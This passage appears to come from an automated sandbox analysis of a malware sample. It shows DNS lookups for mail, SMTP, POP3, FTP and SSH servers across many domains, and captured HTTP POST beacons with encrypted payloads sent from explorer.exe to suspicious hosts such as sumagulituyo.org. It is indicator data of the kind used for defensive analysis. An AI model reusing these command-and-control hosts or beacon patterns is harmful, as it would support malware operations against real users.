                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.333142996 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.333142996 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.333981991 CET1.1.1.1192.168.2.60x715bName error (3)relay.frametalent.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.335522890 CET1.1.1.1192.168.2.60xbaefName error (3)pop3.eremina.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.349287033 CET1.1.1.1192.168.2.60x5309Name error (3)mailgate.finaleasing.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.349842072 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.349842072 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.349842072 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.349842072 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.349842072 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.349842072 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.349842072 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.350159883 CET1.1.1.1192.168.2.60x6df9Name error (3)relay.finaleasing.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.360203981 CET1.1.1.1192.168.2.60x61a8No error (0)pop.evstratov.de85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.367609024 CET1.1.1.1192.168.2.60xf0deName error (3)ssh.mcsmk8.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.380405903 CET1.1.1.1192.168.2.60xb941Name error (3)mail.ext.bynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.407627106 CET1.1.1.1192.168.2.60xca47Name error (3)pop3.ext.bynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.409734011 CET1.1.1.1192.168.2.60xea83No error (0)mail.slovtain.sk109.74.157.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.413180113 CET1.1.1.1192.168.2.60x33ecName error (3)mail.condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.419030905 CET1.1.1.1192.168.2.60xd7f7No error (0)mail.ershov.orgghs.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.419030905 CET1.1.1.1192.168.2.60xd7f7No error (0)ghs.google.com142.251.167.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.442261934 CET1.1.1.1192.168.2.60x6f0eName error (3)smtp.ext.bynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.454345942 CET1.1.1.1192.168.2.60xea7fName error (3)mailgate.doriangrey.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.498732090 CET1.1.1.1192.168.2.60xb756No error (0)pop.evropskypravnik.cz81.31.35.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.502454042 CET1.1.1.1192.168.2.60x9420No error (0)mailgate.evropskypravnik.cz81.31.35.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.532923937 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.532923937 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.532923937 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.532923937 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.532923937 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.532923937 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.532923937 CET1.1.1.1192.168.2.60x3503No error (0)mail.finaleasing.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.533277988 CET1.1.1.1192.168.2.60xea83No error (0)mail.slovtain.sk109.74.157.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.533284903 CET1.1.1.1192.168.2.60xf5a3No error (0)pop3.evstratov.de85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.533297062 CET1.1.1.1192.168.2.60x5309Name error (3)mailgate.finaleasing.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.533428907 CET1.1.1.1192.168.2.60x9f27Name error (3)mailgate.eremina.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.533435106 CET1.1.1.1192.168.2.60x6f0eName error (3)smtp.ext.bynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.533539057 CET1.1.1.1192.168.2.60x715bName error (3)relay.frametalent.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.533684969 CET1.1.1.1192.168.2.60xf07dNo error (0)mx2.postmaster.hu80.249.168.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534089088 CET1.1.1.1192.168.2.60x61a8No error (0)pop.evstratov.de85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534096003 CET1.1.1.1192.168.2.60x2dacNo error (0)mail.moraci.it84.33.37.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534224033 CET1.1.1.1192.168.2.60xea7fName error (3)mailgate.doriangrey.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534230947 CET1.1.1.1192.168.2.60x1fd5No error (0)relay.evstratov.de85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534241915 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534241915 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534241915 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534241915 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534241915 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534241915 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534241915 CET1.1.1.1192.168.2.60xae95No error (0)mail.frametalent.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534246922 CET1.1.1.1192.168.2.60xb756No error (0)pop.evropskypravnik.cz81.31.35.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534528971 CET1.1.1.1192.168.2.60xca47Name error (3)pop3.ext.bynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.534746885 CET1.1.1.1192.168.2.60x6df9Name error (3)relay.finaleasing.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.535342932 CET1.1.1.1192.168.2.60xd7f7No error (0)mail.ershov.orgghs.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.535342932 CET1.1.1.1192.168.2.60xd7f7No error (0)ghs.google.com142.251.167.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.535350084 CET1.1.1.1192.168.2.60x6ebfName error (3)mail.estbest.eenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.535571098 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.535571098 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.535571098 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.535571098 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.535571098 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.535571098 CET1.1.1.1192.168.2.60x1d3No error (0)mx2.spaceweb.ru77.222.41.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.536225080 CET1.1.1.1192.168.2.60x33ecName error (3)mail.condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.536231995 CET1.1.1.1192.168.2.60x9420No error (0)mailgate.evropskypravnik.cz81.31.35.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.541287899 CET1.1.1.1192.168.2.60x9953Name error (3)aopcgaming.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.547276974 CET1.1.1.1192.168.2.60x6e0No error (0)mx2.forwardemail.net104.248.224.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.547812939 CET1.1.1.1192.168.2.60xbfa0Name error (3)mail.topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.547974110 CET1.1.1.1192.168.2.60x68e6Name error (3)ssh.joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.548150063 CET1.1.1.1192.168.2.60xb5bcName error (3)mailgate.entodo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.549247980 CET1.1.1.1192.168.2.60xe652Name error (3)imap.egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.550084114 CET1.1.1.1192.168.2.60x5c15Name error (3)mailgate.conceptualintegration.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.550091028 CET1.1.1.1192.168.2.60x44c9Name error (3)smtp.entodo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.552253008 CET1.1.1.1192.168.2.60x7b61Name error (3)winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.565905094 CET1.1.1.1192.168.2.60xa931No error (0)smtp.mgnbizlaw.comsmtp.secureserver.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.565905094 CET1.1.1.1192.168.2.60xa931No error (0)smtp.secureserver.net216.69.141.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.565905094 CET1.1.1.1192.168.2.60xa931No error (0)smtp.secureserver.net68.178.213.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.565905094 CET1.1.1.1192.168.2.60xa931No error (0)smtp.secureserver.net68.178.213.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.597207069 CET1.1.1.1192.168.2.60x259dName error (3)erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.608329058 CET1.1.1.1192.168.2.60x1648Name error (3)mail.elseti.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.641134977 CET1.1.1.1192.168.2.60xa29No error (0)smtp.azarkavin.com193.141.65.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.641141891 CET1.1.1.1192.168.2.60xa29No error (0)smtp.azarkavin.com193.141.65.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.644623041 CET1.1.1.1192.168.2.60xe592Name error (3)devbreeze.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.658680916 CET1.1.1.1192.168.2.60xd1bbNo error (0)mail.evstratov.de85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.673836946 CET1.1.1.1192.168.2.60xe484Name error (3)mail.elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.678783894 CET1.1.1.1192.168.2.60xb7b4Name error (3)joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.680052996 CET1.1.1.1192.168.2.60x23a2Name error (3)brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.683187008 CET1.1.1.1192.168.2.60x62d8Name error (3)smtp.3marc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.702236891 CET1.1.1.1192.168.2.60xe32aName error (3)mailgate.neugear.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.723848104 CET1.1.1.1192.168.2.60x252No error (0)mailgate.reign.dk46.30.215.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.727783918 CET1.1.1.1192.168.2.60xc249No error (0)pop3.reign.dk46.30.215.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.728619099 CET1.1.1.1192.168.2.60x9f29Name error (3)elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.753694057 CET1.1.1.1192.168.2.60x4561No error (0)smtp.evstratov.de85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.852401972 CET1.1.1.1192.168.2.60x8d4cName error (3)pop3.yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.853677988 CET1.1.1.1192.168.2.60x9338Name error (3)imap.yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.992805958 CET1.1.1.1192.168.2.60x6648Name error (3)pop3.ershov.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.992816925 CET1.1.1.1192.168.2.60x6648Name error (3)pop3.ershov.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.113261938 CET1.1.1.1192.168.2.60x6edcName error (3)ftp.ershov.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.113269091 CET1.1.1.1192.168.2.60x6edcName error (3)ftp.ershov.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.132354021 CET1.1.1.1192.168.2.60xa44eName error (3)smtp.manizan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.132360935 CET1.1.1.1192.168.2.60xa44eName error (3)smtp.manizan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.278753996 CET1.1.1.1192.168.2.60xc241No error (0)mail.datasense.frdatasense.frCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.278753996 CET1.1.1.1192.168.2.60xc241No error (0)datasense.fr144.217.97.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.278764009 CET1.1.1.1192.168.2.60xc241No error (0)mail.datasense.frdatasense.frCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.278764009 CET1.1.1.1192.168.2.60xc241No error (0)datasense.fr144.217.97.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.458254099 CET1.1.1.1192.168.2.60xb2b5Name error (3)er.styggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.608547926 CET1.1.1.1192.168.2.60xa145Name error (3)imap.datasense.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.608556986 CET1.1.1.1192.168.2.60xa145Name error (3)imap.datasense.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.617638111 CET1.1.1.1192.168.2.60x7879Name error (3)mail.joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.618985891 CET1.1.1.1192.168.2.60x9dd2Name error (3)mail.bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.644097090 CET1.1.1.1192.168.2.60xcafeName error (3)bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.647372961 CET1.1.1.1192.168.2.60xc120Name error (3)ftp.bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.647917986 CET1.1.1.1192.168.2.60xe871Name error (3)ssh.elseti.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.648149967 CET1.1.1.1192.168.2.60xdbd3Name error (3)ftp.brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.649857998 CET1.1.1.1192.168.2.60x2cddName error (3)ftp.egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.649863958 CET1.1.1.1192.168.2.60x89daName error (3)mail.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.650831938 CET1.1.1.1192.168.2.60xe73dName error (3)ftp.winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.712733984 CET1.1.1.1192.168.2.60x8da5Name error (3)ftp.elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.761086941 CET1.1.1.1192.168.2.60x14b9Name error (3)mail.euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.788270950 CET1.1.1.1192.168.2.60xa0b2Name error (3)mail.egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.800843954 CET1.1.1.1192.168.2.60x14b9Name error (3)mail.euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                0192.168.2.64971634.94.245.237804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:34.853394985 CET331OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://hanidnvetibgeinm.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 129
                                                                                                                                                                                                                                                                                                                Host: sumagulituyo.org
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:34.853441000 CET183OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 85 a9 35 c7
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bO5mi#2A+m|2 jHk4
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:35.075172901 CET472INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:34 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=56ec3352fe78908d3f5785c6586785fe|149.18.24.110|1701479194|1701479194|0|1|0; path=/; domain=.sumagulituyo.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=149.18.24.110; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                1192.168.2.649717104.198.2.251804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:35.441579103 CET329OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://qsnvftnofreqd.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 156
                                                                                                                                                                                                                                                                                                                Host: snukerukeutit.org
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:35.441625118 CET210OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 f1 f4 33 e9
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bO3,Ntdjy"fBj@R/Yd"'
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:35.664624929 CET473INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:35 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=1832580b5b6360da50784965647c25a1|149.18.24.110|1701479195|1701479195|0|1|0; path=/; domain=.snukerukeutit.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=149.18.24.110; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                2192.168.2.64971834.143.166.163804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:37.034729958 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://usgehfhqjpyqm.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 119
                                                                                                                                                                                                                                                                                                                Host: lightseinsteniki.org
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:37.034761906 CET173OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 bd b3 10 a9
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bOl)Y0Z&M&,yH<&
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:37.590352058 CET476INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:37 GMT
